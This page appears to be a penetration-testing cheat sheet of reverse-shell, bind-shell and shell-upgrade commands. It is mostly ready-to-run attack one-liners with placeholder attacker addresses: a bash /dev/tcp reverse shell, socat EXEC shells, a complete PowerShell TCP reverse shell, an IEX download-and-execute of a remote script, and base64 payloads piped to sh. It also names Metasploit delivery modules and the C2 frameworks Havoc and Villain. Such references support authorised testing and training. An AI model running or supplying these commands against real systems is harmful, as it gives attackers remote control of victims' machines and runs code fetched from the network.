Reverse & Bind Shells

busybox nc

Listener

nc -nlvp <PORT>

Public to the world

ngrok tcp <PORT>

Main

/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';

echo "<PayloadBASE64>" | base64 -d | sh

socat TCP4:<myIP>:<myPORT> EXEC:/bin/bash

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -enc <PayloadBASE64>

With Invoke-PowerShellTcp.ps1 on attacker machine and adding at the end Invoke-PowerShellTcp -Reverse -IPAddress <MY_IP> -Port <MY_PORT> On the victim

powershell IEX(New-Object Net.Webclient).downloadString('http://<MY_IP>:<MY_PORT>/Invoke-PowerShellTcp.ps1')

exploit/multi/script/web_delivery

exploit/windows/smb/smb_delivery

TTY

Description

Command

Bash

/bin/bash -i

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl —e 'exec "/bin/sh";' perl: exec "/bin/sh";

Ruby

ruby: exec "/bin/sh"

Lua

lua: os.execute('/bin/sh')

AWK

awk 'BEGIN {system("/bin/sh")}'

Socat

On Attacker socat file:`tty`,raw,echo=0 tcp-listen:<PORT2> On RevShell socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<Attacker_IP>:<PORT2>

penelope

Shell handler with auto-upgrade shells to PTY

ConPtyShell

Windows TTY stty raw -echo; (stty size; cat) | nc -lvnp <PORT> IEX(IWR http://<IP_SERVER>:<PORT_SERVER>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell <MY_IP> <MY_PORT>

<CTRL+Z>
stty raw -echo 
fg

Command & Control (C2)

Havoc

Havoc is a modern and malleable post-exploitation command and control framework with GUI. Doc

Villain

A high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines). Doc

Last updated 3 months ago

Was this helpful?